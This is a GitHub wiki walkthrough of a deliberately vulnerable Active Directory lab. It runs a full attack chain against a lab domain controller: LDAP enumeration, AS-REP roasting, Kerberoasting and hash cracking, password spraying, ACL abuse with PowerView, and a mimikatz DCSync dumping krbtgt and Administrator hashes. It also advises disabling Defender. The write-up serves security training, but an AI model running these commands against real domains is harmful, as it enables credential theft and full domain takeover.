Writeup - WaterExecution/vulnerable-AD-plus GitHub Wiki
ldapsearch -h 10.10.10.100 -x -s base namingcontexts# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=change,DC=me
namingcontexts: CN=Configuration,DC=change,DC=me
namingcontexts: CN=Schema,CN=Configuration,DC=change,DC=me
namingcontexts: DC=DomainDnsZones,DC=change,DC=me
namingcontexts: DC=ForestDnsZones,DC=change,DC=me
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i descriptionOutput:
...
description: New user generated password: =W{Z5FM
description: Company default password(Reset ASAP)
...ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i "description: New" -A 23Output:
description: New user generated password: i+7UKY;
...
sAMAccountName: jessika.luella
Get accounts with the attribute DONT_REQ_PREAUTH
GetNPUsers.py -request -dc-ip 10.10.10.100 change.me/
Output:
python3 GetNPUsers.py -request -dc-ip 10.10.10.100 change.me/
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
Name MemberOf PasswordLastSet LastLogon UAC
------------ --------------------------------------------- -------------------------- -------------------------- --------
doreen.elana CN=Senior management,CN=Users,DC=change,DC=me 2021-09-03 21:00:43.942822 2021-09-05 15:19:18.781665 0x400200
debbie.alfie CN=Accounting,CN=Users,DC=change,DC=me 2021-09-03 21:00:43.991219 2021-09-05 15:18:52.978908 0x400200
[email protected]:ca0087b7b39a3351c9583e5828bcf660$9af3abd666a9e17d97a49ebf807584ffcf75af607e2b2c4bf62f7be308206831ba2e8e6e34ce14f88f7986438223d29e2420ddbd41a751a35da5d0c41ceeb28ee6f02d03bc21832ac5b500dbe7cb3d80dd4ebaefcf223c0b4dc8ea8a16e36a6dbeb71eb9fe7229c19b8b0f94626ab88431862845c481ed81c10a8315eb762156136b37309c17bd32c50105f9ed5c84bb7f2d6e21e0b82a79128d685080eb0eeeda8a160222db98bd78051899416f917d03ebf415800d08f26d89bf185868f63f526d1ffb7e1e4e3e42f5e0adfebfc1a0ff3a6b3a19d75fa31ec6ba09eef139cacfcc0299aaea
[email protected]:69437ad0022d1fceba798239434420f3$4d8c41a002e383c5d38b136bbf46330e4a8132263f733094086982721826501ba8f68894fd0faff315ff2430d01afad02c7d71b926fe4303a67a2d92ea07044b63c964606d0f930e94c2747b06ae61fbb49bfa0b87b1b06cf7e172c81da99676590c9415d88ac946b6b3c9d361f493509e1816970ec460a3d40b5e4f6ff9bb4e3c5884b7057491ffb93fb2a96fdc116b353860924c66da1d5a52de40e3cfe76d13e9f436122c869e4fbbb364f1518b48bd75ee0a5611ab3cfd0ac3d60c5c82cdf9eff62fc2ed056e9f827a7aa9219762cf4e910269387374084c7e52c639c40ba042da2c33c8
GetNPUsers.py -request -dc-ip 10.10.10.100 change.me/doreen.elana
Output:
GetNPUsers.py -request -dc-ip 10.10.10.100 change.me/doreen.elana
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
Password:
[*] Cannot authenticate doreen.elana, getting its TGT
[email protected]:9fb4b16c4249adbe79033321da923d1f$7d716780c0ca219103000e9a4595c80435bfa9dcde4906625ae0a2f49ca75b8127a1223a79bd0bc2faad9722e4c4dcfe2f021dffb62c4568fcd0edfd2a9f55e9f77d090b1796686d01e9413467af060f11d8ac5193ab52759b8d3456fafc0320257b230650d0b1bd240b39a2533648522d76d8e6ae9456aa8515cfa48c6856882c17aee0f2d3058e48c8d75256af59f76659474417c4c6038cc15a9e7e17a3e0f1a60d66cd8ed3d867132d6718d7701d956b85bc8a312133429c23bc96535779acac8235e795cb8c200c97629ce7501e25639475f5360ea78336913f882f33fc56dfb2639313
For Rubeus, add
$23to hash
hashcat.exe -m 18200 -a 0 D:\hashes.txt D:\Wordlist\rockyou.txt
hashcat.exe -m 18200 -a 0 hashes.txt rockyou.txt
[email protected]:9fb4b16c4249adbe79033321da923d1f$7d716780c0ca219103000e9a4595c80435bfa9dcde4906625ae0a2f49ca75b8127a1223a79bd0bc2faad9722e4c4dcfe2f021dffb62c4568fcd0edfd2a9f55e9f77d090b1796686d01e9413467af060f11d8ac5193ab52759b8d3456fafc0320257b230650d0b1bd240b39a2533648522d76d8e6ae9456aa8515cfa48c6856882c17aee0f2d3058e48c8d75256af59f76659474417c4c6038cc15a9e7e17a3e0f1a60d66cd8ed3d867132d6718d7701d956b85bc8a312133429c23bc96535779acac8235e795cb8c200c97629ce7501e25639475f5360ea78336913f882f33fc56dfb2639313
:1992
doreen.elana:1992
ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i "company default password"description: Company default password(Reset ASAP)
...
sAMAccountName: nichole.janelle
...
...
description: Company default password(Reset ASAP)
...
sAMAccountName: gavrielle.guinnaCreate a password list.
echo "change" >> potential.txt
hashcat -a 6 potential.txt "?d?d?d" --force --stdout > password.txt
Using crackmapexec, you can bruteforce either accounts using a password list.
cme smb 10.10.10.100 -u nichole.janelle -p password.txt
cme smb 10.10.10.100 -u Gavrielle.Guinna -p password.txtSMB 10.10.10.100 445 DC [+] change.me\nichole.janelle:change132
SMB 10.10.10.100 445 DC [+] change.me\Gavrielle.Guinna:change132 ldapsearch -h 10.10.10.100 -x -b "DC=change,DC=me" | grep -i serviceservicePrincipalName: mssql_svc/mssqlserver.change.me
servicePrincipalName: http_svc/httpserver.change.me
servicePrincipalName: exchange_svc/exserver.change.meTo use the account you will need to reset the password. description: New user-generated password: =W{Z5FM
smbpasswd -r 10.10.10.100 -U 'jessika.luella'
GetUserSPNs.py -request -dc-ip 10.10.10.100 change.me/jessika.luella
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------- ------------ -------- -------------------------- --------- ----------
mssql_svc/mssqlserver.change.me mssql_svc 2021-06-16 23:28:33.186290 <never>
http_svc/httpserver.change.me http_svc 2021-06-07 22:42:54.144313 <never>
exchange_svc/exserver.change.me exchange_svc 2021-06-07 22:42:54.175986 <never>
$krb5tgs$23$*http_svc$CHANGE.ME$change.me/http_svc*$19f16990dec720eb65e2b788371bd87d$e9ede30981e8c512832deb5ad60719d5d0f72a2fa8c0d091d42f896cb9aa3dfde8e8c03ec0a637f
e0b16e969c157fc51b90b6f482b3a1006fe1649c06df17525c0fc79ebe53691914982c7fc431e8e1bbd4848ff21f37c6901c4732f51ae37848f2a36802518a60902f785a5e7d04c830cc3f27b031c37ebebc
5d29fe133ec57750e7ab108f0333ed101fa063b62f55ad9fc4ae757afad9ab54b66976840943d9f38f4a74b8d1c52ab3d5625c069ee9f72cbb046a7e2637fcf16989a990713871afe8c1d8877cda1dbd901c
27425630e1fbec72a3748652c003c4d28f706753194138bf45f64524fbd4ec2a5edbe6a75d6a929ddc563a11d87bf05d57e29543f01716a9064d813a92170d9aa167c8c69e49e915f49d67fe98673baa7426
16ce40dc7ffc4d8e9c609cfd2323958481942922d69a41b635a4c8b3994b1a3d4b985a298097bf55d64c351f10b3a0fed6e98235baf669c3a30ee18acac7cffd93587843e39bef05a2a3dd41fabe38b2efe9
a36791e809adf80cb5d10d014f34a54eeeade620d335a18e2ee0b6eb939ad47d272f0169b783980a817aff900fc4238fbb696578b6400a7ccaf2e4f64a55d10f6d2adb13ed9e32711ef4f3902e28afd0d338
1f825da24ed51580c6910cc40968596765bca0cc1adfd667292c57679a0b4bb65fa27fec70c2adfea5f29e4f0f0af9d7371086522220ad0ec1f17d4949bdd4907653c4f246350598bbf9f92249a18075b117
0558109707438364332196e774cedf0cef1137e7cd61dbb83296c4bda39c2e166b1450454b5d89ddb7f64674e6695be6e211b9ac9670be02a4b5e6cbf0f7e8f3ce3f89ebdaeb83e5fc4b16942ed8b5c53c02
74905610109edc12b5a5ff923c65b2e7371a1c378978ae4a81cc71b0490fe043c9d7edca4f0c7d530ac3214581c64c7dc6efafbd104c515564bf2e16a30dfe8d0055944f1dcd829ebe9c72cbfe8b5df79b3b
1deabe3743396d0a8ee291bb2379a5345e4859c50ed8bef07c528822588daebbf92aba7c3996d08b36b90b02b5b52946a56a4885eb9a3d8cc486a8df921037f0cd07bbf05e252a22030fd6a2a3b05d6a61da
877cc793f014ae3a12f60c05c531e3ae10a591bb68920a06627a0c4d0a6e9eeb6f83f31d96da757ab39985edc8f72584345a4bb45247d875b99220f37831406f9a8be817e59788d1f65d09ae4b68a7351db1
bafbcd905daa1be703690f39a9846b37050832a32189d31708a4b20ab9962664c748e8a846195a7f6c03d37fd5ff19e9b08e1a87f3aa0df621c9045735b278581b5b202032c5633f27c68f374776a9f1a919
93c2b37 hashcat.exe -m 13100 -a 0 hashes.txt password.txt$krb5tgs$23$*http_svc$CHANGE.ME$change.me/http_svc*$afb105
fedd7b6bf5e44cdb9c926c23b6$80dac356f33a4f59bcaab494541e86a
7a4305bd55d6474c7f1e21d7dd0ab3841929d3ad5e081cd62cf964462c
1b95bae2876df643709afa701a69a2bc4be52158e52e45fcaa4641a06e
a74f5eb0a21d56c84542098629809529d378d8a98bf5686911e4942d0f
0a8d282ce9afa0bae2f1b70f580cfeaf2baca3b8fbbe8caa781f29031d
af74aebef5122ee7b7810465f6d8c764ff217fd7572e0d3d12a9d465818
df291d7aeabebcb501de79a46107b0ac345705e8a4ee271b5e5091e04ce
79287753939171d0258018afae691eb87b904d017249b7dcb37c2ccce76
9778ab54884df9c31447da2f48dd8e4c2eab1a261d214744a319d7d5100
798238d201af0016008f77cec049c1dfad1641df2e72e60dd3b495a34ab
194fdfcd4dc249a4e9b92bc4108230695eced5ee95506fdb550b1a4285f
a3cf0413073fbc626c1a53bfaac63c978ad6ee678a030bf596a3014337b
ee773e5e87c4937662dbd3e96b2bf468ab0b8965c8481f02b6f20b4f9f2
21dab91f3f466076d840179fdc882fb5fdb57535cc817a23d55f5e5ec94
39e625d6904754691e39b8eff13c12a0a6310c3a68878eb49ec6d88080c
b5029c827f29534c14f01f6d2080bb9996602960391babbbc3eec28cd81
293734284c0689115526b5454cbe949b1f69dceff586292e60ef2c4a838
ccd12cd1a68148be9c2560cc71c0074c9fdc94570e6ba4881fc2626ebc13
751efaa8338d6c49042a4ff1b725c0646c400511310f990aab3e826fb40
762aba74efa6989badf7bbfc168f969cad4259380b1d99e1bfca6135462a
d321062c25974235cf2ed09368d41f02688bcba16d2170203f9eb5bbe929
e1da21d49ca3b911fea1d258c3a177bb0887904c23a9ae88643cbbb6087e
b53a9175cb9c4b8334b64bc77917e290438e4916c480538c61744935c1dc
64a14eb3fa66e2c2e861f7ddd4ce566ff7604c550bf7597cce9bce039d83
1cef22b4a26fdf0687f9bc9d636df3719338170a63742a07eeab36d45f23
c29a4e3149124bf2e48f4543ff1f99071592a5556a932fc531d4ba2a390e
b1edfd5d9a18b88fb2c02a2056a3e576a95449548f01b6766e03a937b783
a45bdf6e2f09f3d87004122787f6100122775879b8851bc594bd71958c2a
1b215efb8a781de8a7d190f001670139c158080f3706bf316c51b68327f6
e7614a3224a49b35ba6c1ffae2f18d32a9f3651ed45453df1677ec9dd95b
e0ab5f1ab113976aeb9445f8fb2fdbf255ae59fd8ef4333a269b4771acd3
349ea22433fc8a2e330be4e974e3e4a926c5151bdef7f208824f8996154f
67a9799783e8a742fdb:mikehttp_svc: mike
Using Powerview with our initial access, accounts with directory replication rights can be found, in order to DCsync. However to gain access to those accounts, some form of privilege escalation is needed, which BloodHound will help to find.
Account from intial access:
description: Company default password(Reset ASAP)
sAMAccountName: nichole.janelle
evil-winrm -i 10.10.10.100 -u nichole.janelle -p change132
Using powerview to see which accounts have "directory replication"
upload PowerView.ps1
import-module .\PowerView.ps1
Get-ObjectACL "DC=change,DC=me" -ResolveGUIDs | ? {($_.ObjectAceType -match 'Replication-Get')}
Output:
AceQualifier : AccessAllowed
ObjectDN : DC=change,DC=me
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
SecurityIdentifier : S-1-5-21-899434533-4132491356-2237190077-1657
Converting the SID to domain name *(Does not work for builtin accounts)
Get-ADUser -Identity S-1-5-21-899434533-4132491356-2237190077-1657
Output:
Filippa Claudina has directory replication rights.
DistinguishedName : CN=Filippa Claudina,CN=Users,DC=change,DC=me
Name : Filippa Claudina
ObjectGUID : 8aac2476-2c50-4e10-9487-2afae074f4c2
SamAccountName : filippa.claudina
SID : S-1-5-21-899434533-4132491356-2237190077-1657
Surname : Claudina
UserPrincipalName : [email protected]
sudo apt intsall neo4j
sudo neo4j console
Login to http://localhost:7474 (neo4j:neo4j)
*Prompt for password change*
./BloodHound --no-sandbox
Login with neo4j:password
https://github.com/BloodHoundAD/BloodHound
Run SharpHound.exe to collect information *(Disable Windows Defender)
upload SharpHound.exe
.\SharpHound.exe
download 0210912204149_BloodHound.zip
nichole.janelle has "WriteOwner" over filippa.claudina (replication account).
*If none of the accounts are linked you may need to run the script until you get one.
Change nichole.janelle's rights from "Own" to "GenericAll"
import .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'change134' -AsPlainText -Force
$Cred = New-Object
System.Management.Automation.PSCredential('change.me\nichole.janelle', $SecPassword)
Set-DomainObjectOwner -Credential $Cred -Identity filippa.claudina -OwnerIdentity nichole.janelle
Add-DomainObjectAcl -Credential $Cred -TargetIdentity filippa.claudina -PrincipalIdentity nichole.janelle -Rights All
Log in to filippa.claudina
net user filippa.claudina 1234 /domain
evil-winrm -i 10.10.10.100 -u filippa.claudina -p 1234
upload mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /user:krbtgt" exit
* SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 31/8/2021 6:36:24 PM
Object Security ID : S-1-5-21-899434533-4132491356-2237190077-502
Object Relative ID : 502
Credentials:
Hash NTLM: 1904f1e6c79caf1a92aab3bc1215da5c
ntlm- 0: 1904f1e6c79caf1a92aab3bc1215da5c
lm - 0: 5281a28c7aa26b3ef017a47789107617
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/6/2021 10:14:55 PM
Object Security ID : S-1-5-21-899434533-4132491356-2237190077-500
Object Relative ID : 500
Credentials:
Hash NTLM: 92937945b518814341de3f726500d4ff